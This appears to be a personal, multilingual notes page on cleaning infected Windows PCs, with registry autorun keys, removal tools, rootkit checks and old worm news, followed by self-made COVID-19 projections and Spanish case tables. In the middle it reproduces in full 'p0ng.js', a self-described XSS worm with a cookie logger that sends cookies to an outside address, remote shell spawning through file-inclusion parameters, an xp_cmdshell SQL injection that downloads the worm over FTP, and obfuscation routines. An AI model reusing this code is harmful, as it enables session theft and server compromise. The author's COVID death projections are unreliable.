AVG "Protection FREE" (not the "PRO", which is a trial)
Can use
Arcadi - converteix Folders en EXEs
After inserting a USB pen into an infected computer, all the folders are converted to a EXE that does not run.
In fact, the folders are hidden, and the EXE's are fake, all with the same length.
The worm is known as W32.SillyFDC
Details :
Windows Defender troba :
- AddOnJet
- HackTool:win32/Gendows - c:\windows\KMservice.exe
MBAM troba
- File c:\users\bisc\AppData\Local\Temp\conhost.exe
- HKU\S-1-5-21-2407356922-175048132-143505944-1000\software\microsoft\windows nt\current version\windows | load := c:\users\bisc\AppData\Local\Temp\conhost.exe
- HKLM\software\classes\exefile | NeverShowExt (REG_SZ) simply exists and should not
- HKLM\software\classes\wow6432node\exefile | NeverShowExt (REG_SZ) simply exists and should not
- HKLM\software\wow6432node\classes\exefile | NeverShowExt (REG_SZ) simply exists and should not
Solució :
- make all files visible - E:\> attrib -h -a -s -r *.* /s /d
- delete EXE's withe the same name as () folders
- set AutoRun to OFF
Autoruns
To permanently prevent threats from using the AutoRun feature the following options are available:
-
Install a Windows hotfix to disable AutoRun on USB drives
This hotfix leaves AutoRun working only with CD and DVD drives, disabling USB which is the most common AutoRun method used by malware to spread.
The
update applies to Windows XP, 2003, Vista, 2008.
-
Disable AutoPlay in your environment using a Group Policy Object (GPO)
Follow the
instructions in the Microsoft TechNet Security Watch article
under Managing AutoPlay in Your Network.
W7 :
- click Start , type Gpedit.msc in the Start Search box, and then press ENTER.
- under Computer Configuration, expand Administrative Templates, expand Windows Components, and then click Autoplay Policies.
- in the Details pane, double-click Turn off Autoplay.
-
Disable the AutoRun functionality using the registry
This Microsoft KB
article explains how to disable AutoRun using the NoDriveTypeAutoRun registry key.
- Use a Symantec Endpoint Protection Application and Device Control policy
Protection features within the
Symantec Endpoint Protection product can be used to block the AutoRun functionality.
Eines
- TDSSKiller is a FREE handy tool that can quickly detect and remove both known and unknown rootkits
- how to remove - use
MBAM
- NPE - Norton Power Eraser
Io Nov 2016 : virus a la tarja SD
En copiar els fitxers a PC, Symantec troba "Dcfly.exe"
2017Gener Sin - li intenten instalar SupremoControl per telefon
eina
Lourdes : Chrome Search Manager extension
Large version,
as malware,
but basically ...
Reset Chrome back to its initial settings :
- Chrome Settings
- Advanced Settings
- Reset Settings
Joaquim Travesset - TheFastPush.com
Fer :
- al Chrome, posar chrome://settings/content/notifications i picar ENTER
- sota "Allow", borrar les URLs sospitoses picant als "3 punts" que hi ha a la dreta i escollint "Delete"
url
Lourdes no poc accedir HTTPS
Chrome i Firefox diuen :
- SEC_ERROR_REUSED_ISSUER_AND_SERIAL
- SEC_ERROR_BAD_SIGNATURE
- STATUS_ACCESS_VIOLATION
Problemes que trobo :
- \AppData\Roaming\WinNetCore\GDCC??.exe {Autoruns}
- \AppData\Local\advapi32\advapi32.exe {Trojan detected by Defender}
- \SysWOW64\KBDKOR.exe (use Process Explorer)
- Defender disabled :
- MpCmdRun.exe -scan -2 : Warn : Product/Feature disabled
WD arguments
- Inicio + Configuracion + Update & Security + "Windows Security" +
"Virus &: Threat Protection" + "Virus & Threat Protection Settings" +
"Real-Time protection := "on" ;
Open Windows Defender security center
wikihow
- $ MpCmdRun.exe /SignatureUpdateAndQuickScan
- see Scheduled Tasks (use AutoRuns) :
Control Panel --> Administrative Tools --> Task Scheduler --> Microsoft --> Windows
Registre
Vigilar :
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\WinLogon\
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\WinLogon\Shell
Use
AutoRuns
Explorer.exe
-
En el SYSTEM.INI,
modifica la línea de ejecución del Explorer.exe
para que también ejecute otra copia del gusano llamada temp.exe:
[boot]
shell = explorer.exe temp.exe
In Register, it corresponds to
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
-
UPD.exe drops a DLL to %Temp%\<Filename>.tmp,
where <Filename> is a combination of two random letters
appended by two random numbers (for example: AF74.tmp).
Spabot then injects this DLL into the Explorer.exe process.
url
-
Attempts to inject a function into Explorer.exe as a thread.
If successful, this threat will continue to run in the Explorer.exe process.
All the actions that the Trojan performs
will appear to be done by Explorer.exe,
and the threat will not show when viewing the process list
in the Windows Task Manager.
url
-
Three Ways to Inject Your Code into Another Process :
url
Delete MSN Gaming Zone
El directori c:\Program Files\MSN Gaming Zone\Windows
es re-omple màgicament després de esborrar-lo !
MS has hidden it very well, but it's there.
Go to Add/Remove Programs,
select Add/Remove Windows Components on the left,
select Accessories and Utilities (don't uncheck it)
and click Details...
Then select Games (don't uncheck it)
and again click Details...
Uncheck Internet Games, then click OK, OK, OK, etc.
Magically, all those evil MSN games are gone.
url
Encara no puc esborrar el directori
c:\P F\MSN Gaming Zone\windows\
Owned by : ?
Com s'esborra \xerox\nwwia ?
Com nassos s'esborra la carpeta c:\Archivos de Programa\xerox\nwwia ?
Rename all sfcfiles.dll into sfcfilesold.dll and reboot.
Com es fà això ?
url
W32.Kabel.B@mm [...] opens a back door on TCP port 58641
allowing a remote attacker to gain unauthorised access to the compromised computer.
Solució : Turn off and remove unneeded services.
Antiparásitos Ciberp@is [23/Sept/2004]
- Ad-Aware SE personal - molt bo : troba coses per tot arreu ( tots
els discs, fins i tot a la paperera ! )
- Spybot Search and Destroy
- Wetroot Spy Sweeper
- Spyware Doctor
- Bazooka Adware and Spyware Scanner
- HijackThis - molt potent i perillós !
- SpywareBlaster
- PestPatrol
- SpyRemover
- SpyKiller
URL's :
- www.download.com/Adware-Spyware-Removal
- SpyHunter -
spyhunterS.exe s'instala on li passa pels nassos !
Antiparásitos The Scream !
URL (descr),
pack.
BHOList - A front end for Tony Kleins BHO collection. Download the latest lists.
CWShredder - A tool for the removal of CoolWebSearch and it's variants.
EndItAll 2 - A modified three finger salute!
HijackThis! - Lists running processes, startups and more.
Startup CPL XP - A very useful full featured startup logger.
StartupList - Displays a list of all startup entries in Notepad.
BHO Demon - Lists all installed BHO's.
LSP-FIX - Winsock 2 repair utility.
Process Viewer - Allows you to view what's actually running.
Process Explorer XP-NT - Provides detailed information about running processes.
Spybot S&D 1.3 - Anti spyware utility.
AboutBuster 1.26 - Removes about:blank hijacks.
Registro limpio
Tras instalar W2K, el Registro contiene :
HKLM -> Software -> Microsoft -> Windows -> Current Version -> Run
Synchronization Manager mobsync.exe /logon
Clean it
from time to time !
Scan On Line
Free downloads
Debian and SucKIT
-
Info
Update
-
Fix
Use chkrootkit, debsums, skdetect
-
Kit
here
- Phrack and SucKit :
SucKIT is a root-kit presented in Phrack issue 58, article 0x07
("Linux on-the-fly kernel patching without LKM", by sd & devik)
,
here :
read it !
- Phrack and
RootKits
What is it ?
A rootkit is a malicious program
that uses system hooks
to conceal its presence on the system.
|
Just run:
# ls -li /sbin/init /sbin/telinit
Here is the output on a normal machine:
304579 -rwxr-xr-x 1 root root 26920 Mar 14 2002 /sbin/init*
304587 lrwxrwxrwx 1 root root 4 Dec 2 13:18 /sbin/telinit -> init*
Here is the output on a compromised machine:
85133 -rwxr-xr-x 1 root root 25636 Mar 26 20:03 /sbin/init
85133 -rwxr-xr-x 1 root root 25636 Mar 26 20:03 /sbin/telinit
In the second case, telinit is a real file (not a symlink) and its time is the time
of the rootkit installation. Note also the incorrect information:
both files have the same inode number but a reference count of one;
this comes from the kernel module hiding the real information.
|
Fixed in Linux 2.4.23 - SuSE 8.2 is 2.4.20 !
Neteja PC's de casa
Mitjaçant T42 & Symantec
| PC name | Deit
|
| P4 | 12/07/2008
|
| RAP | 02/08/2008
|
| HP Arcadi |
|
| HP Kayak |
|
Epidemies
|
2003
Best :
- SQL Slammer - el más eficaz
- Bugbear.B - el más dañino
- Klez.I - el más persistente
- Gibe.C - el más ingenioso
- Nachi.A - el más ladino
- Ganda.A - el más oportunista
- Sobiq.F - el más rápide
|
|
2004
Best :
- Downloader.GK trojan
- Netsky.P
- Sasser.ftp
- Gaobot.gen
- Mhtredir.gen
- Netsky.D
- Downloader.L
- Qhost.gen
- Netsky.B
- StartPage.FH
|
|
Agost 2005 [La Vanguardia, 18/08/2005]
|
Noticies
Según informa 'The New York Times'
Un virus bloquea empresas, instituciones y medios de comunicación en EE.UU.
Atacó principalmente los sistemas que operan con Windows 2000
LVD - 17/08/2005 - 09.45 horas
Washington. (EFE).-
Un virus informático del tipo gusano
atacó los sistemas que operan con Windows 2000 en empresas,
instituciones y medios de comunicación de Estados Unidos,
entre ellos las cadenas de televisión CNN y ABC
y el diario "The New York Times".
Los problemas en la CNN y en el diario neoyorquino se resolvieron
en 90 minutos y sus operaciones no se vieron afectadas,
según fuentes oficiales.
El virus también apagó ordenadores en el Congreso,
que está en receso de verano,
y causó problemas en los de la agencia de noticias Associated Press (AP)
y de la industria de maquinaria agrícola Caterpillar,
en el estado de Illinois.
Sin embargo, una fuente de la Oficina Federal de Investigaciones (FBI)
manifestó que los problemas que han surgido en los sistemas informáticos
no parecen ser parte de algún ataque generalizado.
CNN, que dijo que la infección se ha extendido a Alemania
y algunos países asiáticos, informó de que sus ordenadores
comenzaron a fallar tanto en Nueva York como en Atlanta
a partir de las 23.00 GMT,
mientras que las dificultades de ABC
fueron advertidas poco después de las 17.30 GMT.
La cadena de televisión por cable citó
las declaraciones de un experto que manifestó que
el ataque parece ser obra de un gusano informático
llamado "rbot.ebq".
Añadió que sus principales síntomas son
una repetida conexión y desconexión del ordenador.
Lysa Myers, de la firma de seguridad informática McAfee,
señaló que el gusano aprovecha
un punto vulnerable del sistema de Microsoft.
Por su parte, Johannes Ullrich, director de una firma de seguridad
informática con sede en Jacksonville (Florida),
añadió que el origen del problema puede ser el virus "zotob",
del tipo "gusano", cuya existencia fue denunciada el lunes.
Según dijo Ullrich a la CNN, este gusano se conecta a un servidor
para pedir instrucciones
y después recorre las redes con la intención de infectarlas.
Indicó que, aunque afecta principalmente al sistema Windows 2000,
también puede dañar o
interrumpir las funciones de algunas versiones anteriores de Microsoft XP.
La existencia del virus "zotob" fue denunciada el lunes en Seattle
por el gigante informático Microsoft Corp,
que indicó que su blanco son los fallos detectados en el
sistema de Windows.
La empresa de seguridad informática Trend Micro Inc.
indicó que ese "gusano" dirige
sus ataques a los sistemas Windows 95, 98, ME, NE, 2000 y las plataformas XP.
Según David Perry, experto de Trend Micro,
el gusano informático puede ser una
derivación del "zotob" y anticipó
que los daos serán "menores" y que los expertos
lograrán neutralizar al "gusano".
La semana pasada, Microsoft suministró "parches"
para resolver los problemas de seguridad del sistema.
MS05-039
Un virus deja a los medios de EE. UU. sin ordenadores
LA VANGUARDIA - 18/08/2005
Agencias. BARCELONA
Los principales medios de comunicación estadounidenses
han tenido que desempolvar sus viejas máquinas de escribir
debido a un virus informático
que ha puesto en jaque todo el sistema de ordenadores.
Un gusano se coló en el sistema informático de
empresas periodísticas tan importantes
como The New York Times, ABC y CNN,
las cuales tuvieron que recurrir a la alternativa
de la máquina para poder proseguir con su trabajo.
Los expertos creen que es una consecuencia de las guerras internas
que hay en EE. UU entre bandas piratas.
El problema comenzó a detectarse el pasado martes
cuando varias cadenas de televisión y diarios
vieron como su sistema informático sufría graves alteraciones.
Entre los gusanos informáticos parece encontrarse el Zotob,
que comenzó su ronda por internet el fin de semana,
y nuevas variantes de Rbot y Bozori.
Aunque los entendidos no saben de dónde proceden los virus,
la firma de seguridad F-Segure,
experta en el tema,
plantea la hipótesis de que el ataque
es el resultado de la competición
entre bandas rivales de piratas informáticos.
"Parece que hay tres diferentes bandas de diseñadores de virus
que lanzan nuevos gusanos a una velocidad alarmante,
como si estuvieran compitiendo para hacerse
con el mayor número posible de máquinas
infectadas", manifestaron desde F-Secure.
Microsoft quitó hierro al asunto
y dijo que, a pesar de los problemas de organización
en los medios de comunicación,
es improbable que los códigos malignos
causen tanto caos como el que produjeron virus como MyDoom o Sobig.
MS05-039
url
The "WORM_RBOT.CBQ" worm has been detected wintbp.exe is the host of the worm.
url
\\vir\10.1.1.115.639.pdf
Behavior blockers
Behavior blockers
/**
* @name:
+-+-+-+-+-+-+-+-+-+-+-+
P 0 N G !
+-+-+-+-+-+-+-+-+-+-+-+
* @file: p0ng.js
* @author: 0x000000, Ronald van den Heetkamp & guests
* @func: universal xss worm
* @date: 2008.01.07
*
**/
/*** string components ***/
String.prototype.urlencode = function(){
return encodeURIComponent(this);
}
String.prototype.xsplit = function(q,x) {
b = this.split(q);
return b[x];
}
String.prototype.xor = function(n) {
x = this;
y = n; x ^ y; y = x ^ y; x = x ^ y;
return x;
}
String.prototype.rand = function(n) {
n ? n = parseInt(n) : n = 1024;
return (Math.floor(Math.random () * n + 1 ));
}
String.prototype.zeroFill = function(d) {
var str = this; while (str.length < d) { str = "0" + str; }
return str;
}
String.prototype.getCharCodes = function() {
var codes = [];
for(var i=0; i<this.length;i++) {
codes.push(this.charCodeAt(i));
}
return codes;
}
String.prototype.toUnicode = function() {
var code = '';
var codes = this.getCharCodes();
for(var i=0; i<codes.length;i++) {
code += '\\u' + codes[i].toString(16).zeroFill(4);
}
return code;
}
String.prototype.toOctal = function() {
var code = '';
var codes = this.getCharCodes();
for(var i=0; i<codes.length;i++) {
code += '\\' + codes[i].toString(8);
}
return code;
}
String.prototype.toHex = function() {
var code = '';
var codes = this.getCharCodes();
for(var i=0; i<codes.length;i++) {
code += '\\x' + codes[i].toString(16);
}
return code;
}
/*** array components ***/
Array.prototype.in_array = function(str) {
ret = false;
for (i=(this.length-1); i>=0; i--) {
if (this[i] == str) {
ret = true;
}
}
return ret;
}
/*** worm auto-append component ***/
function worm(uri) {
w = document.createElement('script');
uri ? u = uri : u = window.location.href;
w.src = u;
try {
document.getElementsByTagName('head')[0].appendChild(w);
} catch(ex) {
document.getElementsByTagName('body')[0].appendChild(w);
}
};
/*** worm XHR object ***/
function xhr() {
var xhtp,xml,s;
try { xhtp = new XMLHttpRequest(); s=true; } catch(ex) {
xml = ['MSXML2.XMLHTTP','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP.4.0',
'MSXML2.XMLHTTP.5.0','MSXML2.XMLHTTP.6.0','MSXML2.XMLHTTP.7.0'];
for (i=(xml.length-1) && !s; i>=0; i--) {
try { xhtp = new ActiveXObject(xml[i]); s=true; } catch(ex) { s=false; }
}
}
return xhtp;
};
Object.prototype.post = function(uri,arg) {
/*** usage: xhr().post('foo.php'); ***/
this.open('POST', uri, true);
this.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
this.setRequestHeader('Content-length', arg.length);
this.setRequestHeader('Connection', 'close');
this.send(arg);
};
Object.prototype.get = function(uri,argv) {
/*** usage: xhr().get('foo.php'); ***/
this.open('GET',uri,true);
this.send (argv);
this.onreadystatechange = function () {
if (this.readyState == 4) {
if (this.status == 200) {
var xmlget = this.responseText;
}
}
};
this.send(argv);
return xmlget;
};
/*** DOM storage component ***/
Object.prototype.domstore = function(url,name,obj) {
try {
globalStorage[''].name=obj; s=false;
} catch(ex) {
url? globalStorage[url].name=obj:globalStorage[document.domain].name;
sessionStorage.name = obj;
s=true;
}
return s;
};
/*** charset information ***/
Object.prototype.charset = function () {
document.charset ? c = document.charset: c = false;
return c;
};
/*** event attach component ***/
Object.prototype.eventer = function(type,listener,useCapture) {
try { this.addEventListener(type,listener,useCapture);
ret = true;
} catch(ex) { var ret = this.attachEvent('on' + type, listener);
ret = true;
}
return ret;
};
/*** form submitting component ***/
Object.prototype.fillform = function(data) {
for(j = 0; j < document.forms.length; ++j) {
xform = document.forms[j];
for(i = 0; i < xform.elements.length; ++i) {
xform.elements[i].value = data;
}
}
};
/*** form hiddenfield submitting component ***/
Object.prototype.fillhidden = function(data) {
for(j = 0; j < document.forms.length; ++j) {
xform = document.forms[j];
for(i = 0; i < xform.elements.length; ++i) {
if(xform.elements[i].type == 'hidden') {
xform.elements[i].value = data;
}
}
}
};
/*** element array component ***/
Object.prototype.elements = function(arg) {
var elems =[];
for (i=0;i<arg.length;i++) {
var e = arg[i];
e = document.getElementById(e);
elems.push(e);
}
return elems;
};
/*** document links component ***/
Object.prototype.links = function() {
rl = [];
lk = document.links;
for(y=0;y<lk.length;++y) {
rl.push(lk[y]);
}
return rl;
};
/*** query parts component ***/
Object.prototype.queryparts = function(uri) {
k = [];
uri?uri=uri:uri=window.location.href;
(uri.indexOf('?')==-1)?i=0:i=1;
if(i) {
//uri = uri.search(/\?/)
j = uri.split("&");
for(i=1;i<j.length;i++) {
j[i] = j[i].replace(/=(.*)/,'');
k.push(j[i]);
}
} else {
k = 0;
}
return k;
};
/*** cookie logger component ***/
Object.prototype.logcookie = function(uri) {
var img = document.createElement('img');
document.appendChild(img);
img.src = uri + "?c="+escape(document.cookie)+"q="+rand();
};
/*** color calculating component ***/
Object.prototype.visited = function(color) {
c = color;
if (this.currentStyle) {
var x = this.currentStyle['color'];
} else if (window.getComputedStyle) {
var x = document.defaultView.getComputedStyle(this,null).getPropertyValue('color');
}
if(c == x) { res = true; } else { res = false; }
return res;
};
/*** most clicked links estimater ***/
Object.prototype.estimate = function(color) {
var link_array = [];
for(i in links()) {
if(i.visited(color)) {
link_array.push(i);
}
}
return link_array;
}
/*** denial of service trigger ***/
Object.prototype.dos = function() {
this.onfocus = function() {d()}
this.onblur = function() {d()}
function d() {
for(i=0;i<800;i++) {
url = window.location.href;
uri = document.location = url;
if (!uri.closed && url.location) {
document.location = url;
}
}
}
};
/*** remote shell spawning component ***/
Object.prototype.spawnshell = function(uri) {
shell = uri + 'shell.php?';
var gateways = ['base_path','theme_path','cmd','dir','req_path','template','base_path','page',
'systempath','phpbb_root_path','returnpath','inc_dir','include','CONFIG[path]','inc','main_path',
'mosConfig_absolute_path','basepath','configFile'];
for(i=0;i<gateways.length;++i) {
xhr().get(document.domain + '?',gateways[i] + '=' + shell);
}
};
/*** hit & run shellspawner ***/
Object.prototype.hitandrun = function(uri) {
shell = uri + 'shell.php?';
var gateways = [];
var l = links();
for(j = 0; j < l.length; ++j) {
gateways.push(queryparts(l[j]))
}
for(i = 0; i < gateways.length; ++i) {
xhr().get(document.domain + '?',gateways[i] + '=' + shell);
}
};
/*** SQL injecter component pOc ***/
Object.prototype.sqlinject = function(vuln_uri,ftpip) {
seq = "1'; exec master..xp_cmdshell 'echo open "+ftpip+" 21 >> %systemroot%\inetpub\wwwroot\p0ng.js';";
seq += "exec master..xp_cmdshell 'echo user foo bar >> %systemroot%\inetpub\wwwroot\p0ng.js';";
seq += "exec master..xp_cmdshell 'echo get %systemroot%\inetpub\wwwroot\p0ng.js >>";
seq += "%systemroot%\inetpub\wwwroot\p0ng.js';";
seq += "exec master..xp_cmdshell 'echo quit >> %systemroot%\inetpub\wwwroot\p0ng.js';";
seq += "exec master..xp_cmdshell 'ftp -i -n -v -s: %systemroot%\inetpub\wwwroot\p0ng.js';";
try {
xhr().get(vuln_uri+seq)
} catch(ex) {
return false
}
};
/*** source morphing component ***/
String.prototype.toVariables = function() {
var code = this;
var operators = ['>','<','&','&&','|','||','%','==','!=','===','!=='];
var operator = operators[Math.floor(Math.random()*operators.length)];
var number1 = Math.floor(Math.random()*10);
var number2 = Math.floor(Math.random()*10);
var statement = number1+operator+number2;
var concatStr = '';
if(eval(statement) == true) {concatStr += statement; } else {
concatStr += '!' + statement; }
concatStr += "?'s1':0";
var customConcat = concatStr;
var separateStatements = ',';
var variablePrefixes = ['b2_','x2_','$_','x_','s_'];
var pos = Math.floor(Math.random()*variablePrefixes.length);
var varName = variablePrefixes[pos];
var vector = concatStr;
var concatString = '';
for(var i=0; i<code.length;i++) {
concatString += (varName + i + '=') + vector.replace("s1", code.charAt(i)) + separateStatements;
}
concatString += '' + varName + (i++) + '=';
for(var i=0; i<code.length;i++) {
concatString += (varName + i);
if(i + 1 < code.length) {
concatString += '+';
}
}
return concatString;
}
Object.prototype.morph = function(s) {
var source = s;
var m = ['unicode','charcodes','octal','hex','urlencode','variables'];
var pos=Math.floor(Math.random() * m.length);
morphtype = m[pos];
source = morphselection(source,morphtype);
return;
}
switch(morphtype) {
case "unicode":source = "eval('"+ source.toUnicode() + "')"; break;
case "charcodes":source = 'eval(String.fromCharCode(' + source.getCharCodes() + '))'; break;
case "octal":source = "eval('"+ source.toOctal() + "')"; break;
case "hex":source = "eval('"+ source.toHex() + "')"; break;
case "urlencode":source = "eval(unescape('"+ escape(source) + "'))"; break;
case "variables":source = source.toVariables(); break;
}
return source;
};
Object.prototype.morphselection = function(source,morphtype) {
switch(morphtype) {
case "unicode":source = matchUnicode(source); break;
case "octal":source = matchOctal(source); break;
case "hex":source = matchHex(source); break;
case "urlencode":source = matchUrlencode(source); break;
case "charcodes":source = matchCharcodes(source); break;
case "variables":source = matchVariables(source); break;
}
return source;
};
Object.prototype.matchVariables = function(source) {
source = source.replace(/(['])([^']+)(['])/,
function($0, $1, $2, $3) { return $2.toVariables() } );
source = source.replace(/(["])([^"]+)(["])/,
function($0, $1, $2, $3) { return $2.toVariables() } );
return source;
};
Object.prototype.matchCharcodes = function(source) {
source = source.replace(/(['])([^']+)(['])/,
function($0, $1, $2, $3) { return 'String.fromCharCode(' + $2.getCharCodes() + ')' } );
source = source.replace(/(["])([^"]+)(["])/,
function($0, $1, $2, $3) { return 'String.fromCharCode(' + $2.getCharCodes() + ')' } );
return source;
};
Object.prototype.matchUrlencode = function(source) {
source = source.replace(/(['])([^']+)(['])/,
function($0, $1, $2, $3) { return 'unescape(\'' + escape($2) + '\')' } );
source = source.replace(/(["])([^"]+)(["])/,
function($0, $1, $2, $3) { return 'unescape("' + escape($2) + '\")' } );
return source;
};
Object.prototype.matchOctal = function(source) {
source = source.replace(/(['])([^']+)(['])/,
function($0, $1, $2, $3) { return $1 + $2.toOctal() + $3 } );
source = source.replace(/(["])([^"]+)(["])/,
function($0, $1, $2, $3) { return $1 + $2.toOctal() + $3 } );
return source;
};
Object.prototype.matchHex = function(source) {
source = source.replace(/(['])([^']+)(['])/,
function($0, $1, $2, $3) { return $1 + $2.toHex() + $3 } );
source = source.replace(/(["])([^"]+)(["])/,
function($0, $1, $2, $3) { return $1 + $2.toHex() + $3 } );
return source;
};
Object.prototype.matchUnicode = function(source) {
source = source.replace(/(\\[uU][\w\d]{4})?(\w*)([\s(]?)/,
function($0, $1, $2, $3) { return $1 + $2.toUnicode() + $3 } );
source = source.replace(/(['])([^']+)(['])/,
function($0, $1, $2, $3) { return $1 + $2.toUnicode() + $3 } );
source = source.replace(/(["])([^"]+)(["])/,
function($0, $1, $2, $3) { return $1 + $2.toUnicode() + $3 } );
return source;
};
URL
Els meus dubtes
- com llençar el Filemon just quan entra un usuari ?
- com detectar un BACKDOOR ?
- com visualitzar la llista de MUTEX ?
- puc fer servir el MD5 ?
Algunes respostes
Adding a new service is the most common technique
to disguise backdoors in the Windows operating system.
This requires involving tools such as
Srvany.exe and Srvinstw.exe that comes with the Resource Kit utility
and also with Netcat.exe [1].
The principle of this operation is
that the srvany.exe tool is installed as a service
and then permits netcat.exe to run as a service.
The latter, in turn,
listens on an appropriate port for any connection.
Once connected, it will have spawned a remote
shell on the server (using cmd.exe)
and from this moment onwards, a hacker has free reign.
url
Cryptocurrency miner in browser
Coses per llegir
-
Llarg i complert
- If HiJackThis fails to display any suspicious entires
and you still believe that you are infected,
Filemon is the next best tool to use.
URL
Coronavirus COVID-19
wikipedia
Quatre xifres
- tots ens infectarem en els propers 3 mesos
- de cada 1.000 persones, 900 ho passaran "asimptomaticament", es a dir, sense simptomes
- els restants 100 tindran simptomes
- de aquestos 100, 80 ho passaran com una grip "dura", tos, dolor, mal de cap, etc
- dels 20 restants, 15 desenvoluparan neumonia (cal ingres hospitalari) i 5 fibrosis pulmonar, que cal UCI
- d'aquestos 5, en moriran 3 : tassa de mortalitat 3 per 1.000
Espanya
- son 40.000.000 de espanyols
- 4.000.000 tindran simptomes
- 3.200.000 passaran una grip forta a casa
- 600.000 els caldra ingres hospitalari
- 200.000 els caldra UCI
- hi haurà 120.000 morts (3/1.000)
Tenen
- 200.000 llits hospitalaris
- 3.800 llits de UCI
URLs : gov.es / BBC :
| Date | Cases | Nous | Deaths | Nous | % (1) | source
|
| 13/03/2020 | 6.023 | | 191 | | 3,17
|
| 14/03/2020 | 6.391 | | 196 | | 3,07
|
| 15/03/2020 | 7.753 | | 288 | | 3,71
|
| 16/03/2020 | 11.279 | | 499 | | 4,42
|
| 17/03/2020 | 13.910 | | 623 | | 4,48
|
| 18/03/2020 | 17.395 | | 803 | | 4,62
|
| 19/03/2020 | 20.410 | | 1.043 | | 5,11
|
| 20/03/2020 | 25.374 | | 1.375 | | 5,42
|
| 21/03/2020 | 28.572 | | 1.720 | | 6,02
|
| 22/03/2020 | 33.089 | | 2.182 | | 6,59
|
| 23/03/2020 | 39.673 | 6.584 | 2.696 | 514 | 6,80 |
ccma
|
| 24/03/2020 | 47.610 | 7.937 | 3.434 | 738 | 7,21 | bbc
|
| 25/03/2020 | 56.188 | 8.578 | 4.089 | 655 | 7,27 | rtve
|
| 26/03/2020 | 64.059 | 7.871 | 4.858 | 769 | 7,58 | ccma
|
| 27/03/2020 | 72.248 | 8.189 | 5.690 | 832 | 7,87 | isciii
|
| 28/03/2020 | 78.797 | 6.549 | 6.528 | 838 | 8,28 | .
|
| 29/03/2020 | 85.195 | 6.398 | 7.340 | 812 | 8,61 | isciii
|
| 30/03/2020 | 94.417 | 9.222 | 8.189 | 849 | 8,67 | isciii
|
| 31/03/2020 | 102.136 | 7.719 | 9.053 | 864 | 8,86 | isciii
|
| 01/04/2020 | 110.238 | 8.102 | 10.003 | 950 | 9,07 | isciii
|
| 02/04/2020 | 117.710 | 7.472 | 10.935 | 932 | 9,29 | isciii
|
| 03/04/2020 | 124.736 | 7.026 | 11.744 | 809 | 9,41 | isciii
|
| 04/04/2020 | 130.759 | 6.023 | 12.418 | 674 | 9,49 | isciii
|
| 05/04/2020 | 135.032 | 4.273 | 13.055 | 637 | 9,66 | .
|
| 06/04/2020 | 140.510 | 5.478 | 13.798 | 743 | 9,81 | .
|
| 07/04/2020 | 146.690 | 6.180 | 14.555 | 757 | 9,92 | .
|
| 08/04/2020 | 152.446 | 5.756 | 15.238 | 683 | 9,99 | .
|
| 09/04/2020 | 157.022 | 4.576 | 15.843 | 605 | 10,09 | .
|
| 10/04/2020 | 161.852 | 4.830 | 16.353 | 510 | 10,10 | .
|
| 11/04/2020 | 166.019 | 4.167 | 16.972 | 619 | 10,22 | .
|
| 12/04/2020 | 169.495 | 3.477 | 17.489 | 517 | 10,31 | .
|
| 13/04/2020 | 172.541 | 3.045 | 18.056 | 567 | 10,46 | .
|
| 14/04/2020 | 177.633 | 5.092 | 18.579 | 523 | 10,45 | .
|
| 15/04/2020 | 182.816 | 5.183 | 19.130 | 551 | 10,46 | .
|
| 16/04/2020 | 188.068 | 5.252 | 19.478 | 505 | 10,36 | .
|
| 17/04/2020 | 191.726 | 4.499 | 20.043 | 565 | 10,45 | .
|
| 18/04/2020 | 195.944 | 4.218 | 20.453 | 410 | 10,44 | .
|
| 19/04/2020 | 200.210 | 4.266 | 20.852 | 399 | 10,41 | .
|
| 20/04/2020 | 204.178 | 3.968 | 21.282 | 430 | 10,42 | .
|
| 21/04/2020 | 208.389 | 4.211 | 21.717 | 435 | 10,42 | .
|
| 22/04/2020 | 213.024 | 4.635 | 22.157 | 440 | . | isciii
|
| 23/04/2020 | 215.820 | 2.796 | 22.524 | 367 | . | .
|
| 24/04/2020 | 218.616 | 2.796 | 22.902 | 378 | . | .
|
| 25/04/2020 | 220.345 | 1.729 | 23.190 | 288 | . | .
|
| 26/04/2020 | 222.176 | 1.831 | 23.521 | 331 | . | rtve
|
| 27/04/2020 | 223.484 | 1.308 | 23.822 | 301 | . | .
|
| 28/04/2020 | 225.628 | 2.144 | 24.147 | 325 | . | rtve
|
| 29/04/2020 | 226.937 | 1.309 | 24.415 | 268 | . | rtve
|
| 30/04/2020 | . | . | 24.824 | 281 | .
|
| 01/05/2020 | 216.582/245.567 (2) | . | 25.100 | 276 | . | rtve root, rtve
|
| 02/05/2020 | 217.466 | 838 | 25.264 | 164
|
| 03/05/2020 | 218.011 | 356 | 25.428 | 164
|
| 04/05/2020 | 219.329 | 867 | 25.613 | 185
|
| 05/05/2020 | 220.325 | 685 | 25.857 | 244
|
| 06/05/2020 | 221.447 | 754 | 26.070 | 213
|
| 07/05/2020 | 222.542 | 1.095 | 26.299 | 229
|
| 08/05/2020 | 223.146 | 604 | 26.478 | 179 | . | rtve
|
| 09/05/2020 | 223.767 | 621 | 26.621 | 143
|
| 10/05/2020 | 224.140 | 373 | 26.744 | 123
|
| 11/05/2020 | 227.436 | 426 | 26.867 | 176
|
| 12/05/2020 | 228.691 | 439 | 27.051 | 184
|
| 13/05/2020 | 229.540 | 506 | 27.321 | 217
|
| 14/05/2020 | 230.183 | 643 | 27.459 | 138 | . | isciii
|
| 15/05/2020 | 230.698 | 539 | 27.563 | 102 | . | rtve, rtve
|
| 16/05/2020 | 231.350 | 421 | 27.650 | 87 | . | rtve
|
| 17/05/2020 | 231.606 | 285 | 27.709 | 59 | . | rtve
|
| 18/05/2020 | 232.037 | 295 | 27.778 | 83 | . | rtve
|
| 19/05/2020 | 232.555 | . | 27.888 | . | . | rtve
|
| 20/05/2020 | 233.037 | 344 | 27.970 | . | . | rtve
|
(1) : morts/cases
(2) confirmados por PCR :
este dato no recoge los casos totales,
ya que el Ministerio de Sanidad solo proporciona desde hace una semana los positivos por test PCR.
El último dato global de test PCR y test de anticuerpos publicado el sábado 2 de mayo por el Instituto de Salud Carlos III informa de un total de 245.567
Catalunya
Catalunya compta amb aproximadament 600 llits d’UCI,
